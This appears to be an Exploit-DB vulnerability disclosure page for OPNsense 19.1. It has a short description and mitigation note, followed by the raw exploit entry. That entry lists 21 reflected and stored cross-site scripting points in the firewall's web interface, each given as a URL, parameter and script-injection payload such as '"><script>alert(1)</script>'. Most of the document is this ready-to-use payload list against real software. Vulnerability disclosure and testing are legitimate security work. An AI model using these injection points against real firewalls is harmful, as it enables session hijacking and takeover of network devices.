OPNsense 19.1 | Cross-Site Scripting

vendor:

OPNsense

by:

Ozer Goker

8.8

CVSS

HIGH

Cross-Site Scripting

CWE

Product Name: OPNsense

Affected Version From: 19.1

Affected Version To: 19.1

Patch Exists: YES

Related CWE: N/A

CPE: a:opnsense:opnsense

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: FreeBSD

2019

OPNsense 19.1 | Cross-Site Scripting

OPNsense is an open source, easy-to-use and easy-to-build FreeBSD based firewall and routing platform. OPNsense includes most of the features available in expensive commercial firewalls, and more in many cases. It brings the rich feature set of commercial offerings with the benefits of open and verifiable sources. This vulnerability is a Cross-Site Scripting (XSS) vulnerability which is a type of injection attack. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. This vulnerability is a combination of reflected and stored XSS. Reflected XSS is a type of XSS attack where the malicious script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Stored XSS is a type of XSS attack where the malicious script is stored on the web server, such as in a database, and is later served to users when they request the tainted web page. This vulnerability affects OPNsense version 19.1.

Mitigation:

To mitigate this vulnerability, the user should ensure that all input is properly sanitized and validated before being used in the application. The user should also ensure that the application is running the latest version of OPNsense.

Source

Exploit-DB raw data:

##################################################################################################################################
# Exploit Title: OPNsense 19.1 | Cross-Site Scripting
# Date: 01.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://opnsense.org
# Software Link: http://mirror.ams1.nl.leaseweb.net/opnsense/releases/19.1/OPNsense-19.1-OpenSSL-dvd-amd64.iso.bz2
# Version: 19.1
##################################################################################################################################

Introduction
OPNsense is an open source, easy-to-use and easy-to-build FreeBSD based firewall and routing platform. OPNsense includes most of the features available in expensive commercial firewalls, and more in many cases. It brings the rich feature set of commercial offerings with the benefits of open and verifiable sources.


#################################################################################


XSS details: Reflected & Stored

#################################################################################

XSS1 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
GDrive_GDriveEmail

PAYLOAD
"><script>alert(1)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
GDrive_GDriveFolderID

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
GDrive_GDriveBackupCount

PAYLOAD
"><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_url

PAYLOAD
"><script>alert(4)</script>

#################################################################################

XSS5 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_user

PAYLOAD
"><script>alert(5)</script>

#################################################################################

XSS6 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_password

PAYLOAD
"><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_password_encryption

PAYLOAD
"><script>alert(7)</script>

#################################################################################

XSS8 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_backupdir

PAYLOAD
"><script>alert(8)</script>

#################################################################################

XSS9 | Stored

URL
http://192.168.2.200/system_advanced_sysctl.php?act=edit

METHOD
Post

PARAMETER
tunable

PAYLOAD
"><script>alert(9)</script>

#################################################################################

XSS10 | Reflected

URL
http://192.168.2.200/system_advanced_sysctl.php?act=edit

METHOD
Post

PARAMETER
value

PAYLOAD
"><script>alert(10)</script>

#################################################################################

XSS11 | Reflected

URL
http://192.168.2.200/interfaces_vlan_edit.php

METHOD
Post

PARAMETER
tag

PAYLOAD
"><script>alert(11)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/interfaces_vlan_edit.php

METHOD
Post

PARAMETER
descr

PAYLOAD
"><script>alert(12)</script>

#################################################################################

XSS13 | Reflected

URL
http://192.168.2.200/interfaces_vlan_edit.php

METHOD
Post

PARAMETER
vlanif

PAYLOAD
"><script>alert(13)</script>

#################################################################################

XSS14 | Reflected

URL
http://192.168.2.200/diag_ping.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(14)</script>

#################################################################################

XSS15 | Reflected

URL
http://192.168.2.200/diag_traceroute.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(15)</script>

#################################################################################

XSS16 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
category

PAYLOAD
"><script>alert(16)</script>

#################################################################################

XSS17 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
category

PAYLOAD
"><script>alert(17)</script>

#################################################################################

XSS18 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan

METHOD
Post

PARAMETER
category

PAYLOAD
"><script>alert(18)</script>

#################################################################################

XSS19 | Reflected

URL
http://192.168.2.200/vpn_ipsec_settings.php

METHOD
Post

PARAMETER
passthrough_networks%5B%5D

PAYLOAD
<img%20src=x%20onerror=alert(19)>

#################################################################################

XSS20 | Reflected

URL
http://192.168.2.200/ui/monit

METHOD
Post

PARAMETER
mailserver

PAYLOAD
<img src=x onerror=alert(20)>

#################################################################################

XSS21 | Reflected

URL
http://192.168.2.200/ui/proxy

METHOD
Post

PARAMETER
ignoreLogACL

PAYLOAD
<img src=x onerror=alert(21)>

#################################################################################